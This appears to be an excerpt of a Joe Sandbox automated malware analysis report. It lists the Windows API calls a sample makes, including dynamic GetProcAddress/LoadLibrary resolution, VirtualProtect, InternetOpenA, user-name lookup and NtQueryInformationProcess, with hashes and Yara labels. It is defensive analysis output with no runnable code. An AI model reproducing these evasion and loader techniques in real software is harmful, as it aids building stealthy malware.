31739->31756 31740 41f190 36 API calls 31740->31752 31741->31739 31743->31737 31744 41fb04 lstrcpy 31744->31752 31745 41fb7e StrCmpCA 31745->31697 31745->31752 31746->31737 31747 41fe1e lstrcpy 31747->31752 31748 41fe98 StrCmpCA 31748->31699 31748->31752 31749 41fbab lstrcpy 31749->31752 31750 41fec9 lstrcpy 31750->31752 31751 41f070 28 API calls 31751->31752 31752->31694 31752->31696 31752->31697 31752->31699 31752->31705 31752->31706 31752->31730 31752->31737 31752->31740 31752->31744 31752->31745 31752->31747 31752->31748 31752->31749 31752->31750 31752->31751 31753 41fbf9 lstrcpy 31752->31753 31754 41ff1a lstrcpy 31752->31754 31753->31752 31754->31752 31757 40161f 31756->31757 31758 40162b lstrcpy 31757->31758 31759 401633 31757->31759 31758->31759 31760 40164d lstrcpy 31759->31760 31761 401655 31759->31761 31760->31761 31762 40166f lstrcpy 31761->31762 31764 401677 31761->31764 31762->31764 31763 401699 31763->31755 31764->31763 31765 401691 lstrcpy 31764->31765 31765->31763 32072 418190 7 API calls 32115 2c887be strtok_s 32032 2c889bc 46 API calls 32163 2c97915 43 API calls ctype 32164 2c99836 170 API calls setSBUpLow 32034 408c9e memcpy 32074 2c79327 19 API calls 32075 2c8cf29 CoCreateInstance MultiByteToWideChar lstrcpyn 32116 2c9982e 6 API calls 2 library calls 32165 2c71920 194 API calls 32035 2c81620 406 API calls 32076 2c86f20 142 API calls 32166 2c83d20 238 API calls 32037 2c93627 GetSystemInfo wsprintfA 32117 2c92027 2173 API calls 32167 2c94d27 32 API calls 32168 2c97d27 5 API calls 3 library calls 32118 2c89027 StrCmpCA ExitProcess strtok_s strtok_s 32038 425cb0 9 API calls 32039 2c77617 VirtualProtect 32169 2c8893b strtok_s strtok_s 32119 2c8503e 290 API calls 32120 2c9982f 173 API calls 2 library calls 32078 2c8f73f 91 API calls 32080 2c8c732 22 API calls

                                                      Executed Functions

                                                      Function 00404C50 Relevance: 112.8, APIs: 61, Strings: 3, Instructions: 807stringnetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00404C7F
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404CD2
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D05
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D35
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D73
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404DA6
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DB6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------$_B
                                                      • API String ID: 2041821634-1334066325
                                                      • Opcode ID: 88c742818b550997190ea262b8b3dfeddd329f6163519cbaa13a339a61b6e4e3
                                                      • Instruction ID: 1552433d623cc160f1fdc82636420e70867d0f7256f5daceb05b59e833827d7b
                                                      • Opcode Fuzzy Hash: 88c742818b550997190ea262b8b3dfeddd329f6163519cbaa13a339a61b6e4e3
                                                      • Instruction Fuzzy Hash: 64528E71A002169BDB21EBA5DD89A9F7BB5AF44304F14103AF905B72D1DB78EC418FE8
                                                      Function 00404A60 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115stringmemorylibraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A74
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7B
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A82
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A89
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A90
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00404AA2
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB2
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB9
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AC0
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AC7
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ACE
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AD9
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AE0
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AE7
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AEE
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AF5
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B0B
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B12
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B19
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B20
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B27
                                                      • LdrInitializeThunk.NTDLL ref: 00404B2F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B53
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B5A
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B61
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B68
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B6F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B7F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B86
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B8D
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B94
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B9B
                                                      • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404BB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrlen$Heap$AllocateInitializeProcessProtectThunkVirtual
                                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                      • API String ID: 2971326882-3329630956
                                                      • Opcode ID: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
                                                      • Instruction ID: 76e4e72d54844b5f718d0498cf6af46f704a1995843b300e33b80144487799f7
                                                      • Opcode Fuzzy Hash: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
                                                      • Instruction Fuzzy Hash: 3431E7A0B4021C7686306BB56C4AFEF7E5CDFCC752F215253F51856181C9B86581CEFA
                                                      Function 004265A0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1465 4265a0-4265cd GetPEB 1466 4267d3-426833 LoadLibraryA * 5 1465->1466 1467 4265d3-4267ce call 426500 GetProcAddress * 20 1465->1467 1468 426835-426843 GetProcAddress 1466->1468 1469 426848-42684f 1466->1469 1467->1466 1468->1469 1471 426851-426877 GetProcAddress * 2 1469->1471 1472 42687c-426883 1469->1472 1471->1472 1474 426885-426893 GetProcAddress 1472->1474 1475 426898-42689f 1472->1475 1474->1475 1476 4268a1-4268af GetProcAddress 1475->1476 1477 4268b4-4268bb 1475->1477 1476->1477 1479 4268e7-4268ea 1477->1479 1480 4268bd-4268e2 GetProcAddress * 2 1477->1480 1480->1479
                                                      APIs
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A1E8), ref: 004265F9
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A200), ref: 00426612
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A218), ref: 0042662A
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A368), ref: 00426642
                                                      • GetProcAddress.KERNEL32(74DD0000,02D65E00), ref: 0042665B
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64088), ref: 00426673
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64408), ref: 0042668B
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A110), ref: 004266A4
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A0B0), ref: 004266BC
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A380), ref: 004266D4
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A2D8), ref: 004266ED
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64308), ref: 00426705
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A0F8), ref: 0042671D
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A1B8), ref: 00426736
                                                      • GetProcAddress.KERNEL32(74DD0000,02D640A8), ref: 0042674E
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A098), ref: 00426766
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A1D0), ref: 0042677F
                                                      • GetProcAddress.KERNEL32(74DD0000,02D642E8), ref: 00426797
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A188), ref: 004267AF
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64128), ref: 004267C8
                                                      • LoadLibraryA.KERNEL32(02D8A320,?,?,?,00421DD3), ref: 004267D9
                                                      • LoadLibraryA.KERNEL32(02D8A290,?,?,?,00421DD3), ref: 004267EB
                                                      • LoadLibraryA.KERNEL32(02D8A278,?,?,?,00421DD3), ref: 004267FD
                                                      • LoadLibraryA.KERNEL32(02D8A230,?,?,?,00421DD3), ref: 0042680E
                                                      • LoadLibraryA.KERNEL32(02D8A248,?,?,?,00421DD3), ref: 00426820
                                                      • GetProcAddress.KERNEL32(75A70000,02D8A338), ref: 0042683D
                                                      • GetProcAddress.KERNEL32(75290000,02D8A140), ref: 00426859
                                                      • GetProcAddress.KERNEL32(75290000,02D8A2A8), ref: 00426871
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8A128), ref: 0042688D
                                                      • GetProcAddress.KERNEL32(75450000,02D64288), ref: 004268A9
                                                      • GetProcAddress.KERNEL32(76E90000,02D65E40), ref: 004268C5
                                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004268DC
                                                      Strings
                                                      • NtQueryInformationProcess, xrefs: 004268D1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: NtQueryInformationProcess
                                                      • API String ID: 2238633743-2781105232
                                                      • Opcode ID: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
                                                      • Instruction ID: 143a59b63f5ba91877edf66354a2a7fa555e43081a608b4dc5d23feccb8ab71c
                                                      • Opcode Fuzzy Hash: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
                                                      • Instruction Fuzzy Hash: CEA15DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683360DBB4A900DFB0
                                                      Function 00421DC0 Relevance: 13.6, APIs: 9, Instructions: 129COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID:
                                                      • API String ID: 190572456-0
                                                      • Opcode ID: 187a10901c5969ef1cf16330aa51fd3c56319b207c6f6a03bf7574c22d845e79
                                                      • Instruction ID: 99c442af194c17dcdf968dcb4d09652326eda7df30839eed1b73e61910dd0112
                                                      • Opcode Fuzzy Hash: 187a10901c5969ef1cf16330aa51fd3c56319b207c6f6a03bf7574c22d845e79
                                                      • Instruction Fuzzy Hash: B74173317003169FC720AFA5ED49B9F76A6AF14754F85003AF901A72E1DF78E905CB98
                                                      Function 00422C10 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422C3F
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422C46
                                                      • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422C5A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocNameProcessUser
                                                      • String ID:
                                                      • API String ID: 1206570057-0
                                                      • Opcode ID: fa738ee861b1d682c4ad799a473bde607761e807e886556c509f5aa502afa864
                                                      • Instruction ID: eafcfd8408abf31dcdc5f7efa7efe72b9a9e0bda40d3ebfab19b25c76b2a2745
                                                      • Opcode Fuzzy Hash: fa738ee861b1d682c4ad799a473bde607761e807e886556c509f5aa502afa864
                                                      • Instruction Fuzzy Hash: B2F054B1A44614AFD710DF98DD49B9ABBBCF744B61F10021AF915E3680D7B419048BE1
                                                      Function 004268F0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 633 4268f0-4268f7 634 426d0e-426da2 LoadLibraryA * 8 633->634 635 4268fd-426d09 GetProcAddress * 43 633->635 636 426da4-426e13 GetProcAddress * 5 634->636 637 426e18-426e1f 634->637 635->634 636->637 638 426ee2-426ee9 637->638 639 426e25-426edd GetProcAddress * 8 637->639 640 426eeb-426f5a GetProcAddress * 5 638->640 641 426f5f-426f66 638->641 639->638 640->641 642 426ff9-427000 641->642 643 426f6c-426ff4 GetProcAddress * 6 641->643 644 427120-427127 642->644 645 427006-42711b GetProcAddress * 12 642->645 643->642 646 427129-427198 GetProcAddress * 5 644->646 647 42719d-4271a4 644->647 645->644 646->647 648 4271d1-4271d8 647->648 649 4271a6-4271cc GetProcAddress * 2 647->649 650 427205-42720c 648->650 651 4271da-427200 GetProcAddress * 2 648->651 649->648 652 427212-4272f8 GetProcAddress * 10 650->652 653 4272fd-427304 650->653 651->650 652->653 654 427362-427369 653->654 655 427306-42735d GetProcAddress * 4 653->655 656 42736b-427379 GetProcAddress 654->656 657 42737e-427385 654->657 655->654 656->657 658 4273e3 657->658 659 427387-4273de GetProcAddress * 4 657->659 659->658
                                                      APIs
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64168), ref: 00426905
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64188), ref: 0042691D
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A3E0), ref: 00426936
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A3B0), ref: 0042694E
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A3C8), ref: 00426966
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A458), ref: 0042697F
                                                      • GetProcAddress.KERNEL32(74DD0000,02D69140), ref: 00426997
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A428), ref: 004269AF
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A398), ref: 004269C8
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D998), ref: 004269E0
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D9B0), ref: 004269F8
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64348), ref: 00426A11
                                                      • GetProcAddress.KERNEL32(74DD0000,02D641C8), ref: 00426A29
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64368), ref: 00426A41
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64208), ref: 00426A5A
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D980), ref: 00426A72
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D968), ref: 00426A8A
                                                      • GetProcAddress.KERNEL32(74DD0000,02D69168), ref: 00426AA3
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64228), ref: 00426ABB
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D950), ref: 00426AD3
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D920), ref: 00426AEC
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D8F0), ref: 00426B04
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D908), ref: 00426B1C
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64388), ref: 00426B35
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D938), ref: 00426B4D
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D788), ref: 00426B65
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D710), ref: 00426B7E
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D6B0), ref: 00426B96
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D728), ref: 00426BAE
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D6F8), ref: 00426BC7
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D800), ref: 00426BDF
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D740), ref: 00426BF7
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D758), ref: 00426C10
                                                      • GetProcAddress.KERNEL32(74DD0000,02D686F0), ref: 00426C28
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D6C8), ref: 00426C40
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D770), ref: 00426C59
                                                      • GetProcAddress.KERNEL32(74DD0000,02D643A8), ref: 00426C71
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D5F0), ref: 00426C89
                                                      • GetProcAddress.KERNEL32(74DD0000,02D643C8), ref: 00426CA2
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D7A0), ref: 00426CBA
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D8A8), ref: 00426CD2
                                                      • GetProcAddress.KERNEL32(74DD0000,02D643E8), ref: 00426CEB
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64028), ref: 00426D03
                                                      • LoadLibraryA.KERNEL32(02D8D848,004206EF,?,00422075), ref: 00426D15
                                                      • LoadLibraryA.KERNEL32(02D8D6E0,?,00422075), ref: 00426D26
                                                      • LoadLibraryA.KERNEL32(02D8D7D0,?,00422075), ref: 00426D38
                                                      • LoadLibraryA.KERNEL32(02D8D7B8,?,00422075), ref: 00426D4A
                                                      • LoadLibraryA.KERNEL32(02D8D608,?,00422075), ref: 00426D5B
                                                      • LoadLibraryA.KERNEL32(02D8D7E8,?,00422075), ref: 00426D6D
                                                      • LoadLibraryA.KERNEL32(02D8D818,?,00422075), ref: 00426D7F
                                                      • LoadLibraryA.KERNEL32(02D8D8C0,?,00422075), ref: 00426D90
                                                      • GetProcAddress.KERNEL32(75290000,02D64048), ref: 00426DAC
                                                      • GetProcAddress.KERNEL32(75290000,02D8D860), ref: 00426DC4
                                                      • GetProcAddress.KERNEL32(75290000,02D8A5D0), ref: 00426DDD
                                                      • GetProcAddress.KERNEL32(75290000,02D8D830), ref: 00426DF5
                                                      • GetProcAddress.KERNEL32(75290000,02D64588), ref: 00426E0D
                                                      • GetProcAddress.KERNEL32(73B40000,02D69190), ref: 00426E2D
                                                      • GetProcAddress.KERNEL32(73B40000,02D64568), ref: 00426E45
                                                      • GetProcAddress.KERNEL32(73B40000,02D68C68), ref: 00426E5E
                                                      • GetProcAddress.KERNEL32(73B40000,02D8D878), ref: 00426E76
                                                      • GetProcAddress.KERNEL32(73B40000,02D8D8D8), ref: 00426E8E
                                                      • GetProcAddress.KERNEL32(73B40000,02D64428), ref: 00426EA7
                                                      • GetProcAddress.KERNEL32(73B40000,02D64628), ref: 00426EBF
                                                      • GetProcAddress.KERNEL32(73B40000,02D8D620), ref: 00426ED7
                                                      • GetProcAddress.KERNEL32(752C0000,02D647C8), ref: 00426EF3
                                                      • GetProcAddress.KERNEL32(752C0000,02D64448), ref: 00426F0B
                                                      • GetProcAddress.KERNEL32(752C0000,02D8D650), ref: 00426F24
                                                      • GetProcAddress.KERNEL32(752C0000,02D8D890), ref: 00426F3C
                                                      • GetProcAddress.KERNEL32(752C0000,02D647A8), ref: 00426F54
                                                      • GetProcAddress.KERNEL32(74EC0000,02D68D30), ref: 00426F74
                                                      • GetProcAddress.KERNEL32(74EC0000,02D68C90), ref: 00426F8C
                                                      • GetProcAddress.KERNEL32(74EC0000,02D8D638), ref: 00426FA5
                                                      • GetProcAddress.KERNEL32(74EC0000,02D64728), ref: 00426FBD
                                                      • GetProcAddress.KERNEL32(74EC0000,02D64668), ref: 00426FD5
                                                      • GetProcAddress.KERNEL32(74EC0000,02D68D58), ref: 00426FEE
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8D668), ref: 0042700E
                                                      • GetProcAddress.KERNEL32(75BD0000,02D64508), ref: 00427026
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8A680), ref: 0042703F
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8D680), ref: 00427057
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8D698), ref: 0042706F
                                                      • GetProcAddress.KERNEL32(75BD0000,02D644C8), ref: 00427088
                                                      • GetProcAddress.KERNEL32(75BD0000,02D645A8), ref: 004270A0
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8DC20), ref: 004270B8
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8DB78), ref: 004270D1
                                                      • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 004270E7
                                                      • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 004270FE
                                                      • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00427115
                                                      • GetProcAddress.KERNEL32(75A70000,02D645C8), ref: 00427131
                                                      • GetProcAddress.KERNEL32(75A70000,02D8DB18), ref: 00427149
                                                      • GetProcAddress.KERNEL32(75A70000,02D8DC80), ref: 00427162
                                                      • GetProcAddress.KERNEL32(75A70000,02D8DB00), ref: 0042717A
                                                      • GetProcAddress.KERNEL32(75A70000,02D8DB60), ref: 00427192
                                                      • GetProcAddress.KERNEL32(75450000,02D64648), ref: 004271AE
                                                      • GetProcAddress.KERNEL32(75450000,02D64468), ref: 004271C6
                                                      • GetProcAddress.KERNEL32(75DA0000,02D64488), ref: 004271E2
                                                      • GetProcAddress.KERNEL32(75DA0000,02D8DB90), ref: 004271FA
                                                      • GetProcAddress.KERNEL32(6F070000,02D644E8), ref: 0042721A
                                                      • GetProcAddress.KERNEL32(6F070000,02D644A8), ref: 00427232
                                                      • GetProcAddress.KERNEL32(6F070000,02D64528), ref: 0042724B
                                                      • GetProcAddress.KERNEL32(6F070000,02D8DA58), ref: 00427263
                                                      • GetProcAddress.KERNEL32(6F070000,02D64788), ref: 0042727B
                                                      • GetProcAddress.KERNEL32(6F070000,02D64548), ref: 00427294
